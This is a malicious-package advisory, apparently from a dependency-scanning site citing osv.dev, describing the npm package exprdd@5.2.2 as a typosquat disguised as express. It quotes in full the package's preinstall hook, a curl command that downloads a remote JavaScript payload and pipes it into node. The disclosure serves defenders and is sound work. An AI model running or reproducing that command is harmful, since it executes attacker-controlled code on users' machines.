Logo
npm

exprdd@5.2.2

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17241

Ecosystem

npm

Summary

package.json declares a preinstall lifecycle hook curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, which fetches an unpinned JavaScript payload from a third-party host (gitflic.ru, retrieved via web.archive.org) and pipes it directly into node. Running npm install exprdd therefore executes attacker-controlled code with the installer's privileges before any package code is reviewed or imported. The tarball reuses express's name-adjacent identifier, description ("Fast, unopinionated, minimalist web framework"), author, contributors, repository (expressjs/express), homepage, and dependency list, and ships express's index.js stub, disguising the dropper as the legitimate express package and increasing the chance of accidental installation via typo.

Source: amazon-inspector (d800570db124bde006fc1d078aefceef4e42acce755653f6d3c8282447a512a4)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.